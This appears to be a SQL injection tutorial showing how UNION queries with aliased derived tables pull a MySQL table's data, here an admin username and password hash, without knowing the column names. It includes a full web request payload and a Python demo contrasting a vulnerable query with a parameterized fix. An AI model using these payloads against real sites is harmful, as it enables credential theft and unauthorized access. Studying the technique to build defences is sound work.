0x00 Overview

Useful when the column names cannot be obtained.

0x01 Test tables

    # tdb_goods table: 7 columns in total
    mysql> select * from tdb_goods limit 0,1;
    +----------+-----------------------+------------+------------+-------------+---------+------------+
    | goods_id | goods_name            | goods_cate | brand_name | goods_price | is_show | is_saleoff |
    +----------+-----------------------+------------+------------+-------------+---------+------------+
    |        1 | R510VC 15.6英寸笔记本 | 笔记本     | 华硕       |    3399.000 |       1 |          0 |
    +----------+-----------------------+------------+------------+-------------+---------+------------+
    1 row in set

    # tdb_admin table: 3 columns in total
    mysql> select id,username,password from tdb_admin limit 0,1;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
    +----+----------+----------------------------------+
    1 row in set

0x02 Experiment

Suppose we only know the table name and not the column names, but we still need to read the data. The SQL can then be written as: select 1,2,3 union select * from tdb_admin;

    mysql> select 1,2,3 union select * from tdb_admin;
    +---+-------+----------------------------------+
    | 1 | 2     | 3                                |
    +---+-------+----------------------------------+
    | 1 | 2     | 3                                |
    | 1 | admin | 7fef6171469e80d32c0559f88b377245 |
    +---+-------+----------------------------------+
    2 rows in set

The id, username and password columns of tdb_admin are now exposed under the column names 1, 2 and 3, so there is no need to know what the table's original column names are.

Next, read the data out. The SQL is below; each original column is addressed by its replacement name:

  • id is replaced by 1
  • username is replaced by 2
  • password is replaced by 3

    # read the id column of tdb_admin
    mysql> select `1` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set

    # read the username column of tdb_admin
    mysql> select `2` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
    +-------+
    | 2     |
    +-------+
    | admin |
    +-------+
    1 row in set

    # read the password column of tdb_admin
    mysql> select `3` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
    +----------------------------------+
    | 3                                |
    +----------------------------------+
    | 7fef6171469e80d32c0559f88b377245 |
    +----------------------------------+
    1 row in set

Note: when reading the data, the LIMIT offset has to start at 1,1 to get the first real row of tdb_admin, because row 0 of the derived table is the placeholder row 1,2,3.

0x03 Putting it together

Web request: http://www.test.com/sql.php?id=-1 union select 1,2,3,4,5,6,(select `2` from (select 1,2,3 union select * from tdb_admin)a limit 1,1);

Database statement: select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);

    mysql> select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
    +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
    | goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff                                |
    +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
    |        1 | 2          | 3          | 4          |       5.000 |       6 | ~1~admin~7fef6171469e80d32c0559f88b377245 |
    +----------+------------+------------+------------+-------------+---------+-------------------------------------------+
    1 row in set
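As an added illustration that is not part of the original post, the request from 0x03 replayed against an in-memory SQLite copy of the two tables: once through the string-concatenated query that sql.php implies, and once through a parameterized query, which is the fix. Assumptions: SQLite's `||` stands in for MySQL's concat(), and the table contents are reconstructed sample rows.

```python
import sqlite3

# Constructed in-memory copy of the two tables from the write-up (sample rows, not real credentials).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tdb_goods (goods_id INTEGER, goods_name TEXT, goods_cate TEXT,
            brand_name TEXT, goods_price REAL, is_show INTEGER, is_saleoff INTEGER);
        INSERT INTO tdb_goods VALUES (1, 'R510VC 15.6-inch laptop', 'laptop', 'ASUS', 3399.0, 1, 0);
        CREATE TABLE tdb_admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO tdb_admin VALUES (1, 'admin', '7fef6171469e80d32c0559f88b377245');
    """)
    return conn

# The write-up's id parameter: the derived table names tdb_admin's columns 1,2,3, so no
# column names are needed. SQLite's || stands in for MySQL's concat(); LIMIT 1,1 skips the
# placeholder row (1,2,3), which UNION orders first because integers sort before text.
PAYLOAD = ("-1 union select 1,2,3,4,5,6,(select `1`||'~'||`2`||'~'||`3` "
           "from (select 1,2,3 union select * from tdb_admin) a limit 1,1)")

def lookup_vulnerable(conn, goods_id):
    # String formatting puts the parameter into the SQL text itself: this is the defect
    # the write-up relies on, so the UNION and subquery run as part of the statement.
    return conn.execute(f"select * from tdb_goods where goods_id = {goods_id}").fetchall()

def lookup_safe(conn, goods_id):
    # Parameter binding: the value is data and cannot change the statement's structure,
    # so the same input is compared as a string against goods_id and matches no row.
    return conn.execute("select * from tdb_goods where goods_id = ?", (goods_id,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))   # last column: 1~admin~<hash>
    print("parameterized:", lookup_safe(db, PAYLOAD))      # []
```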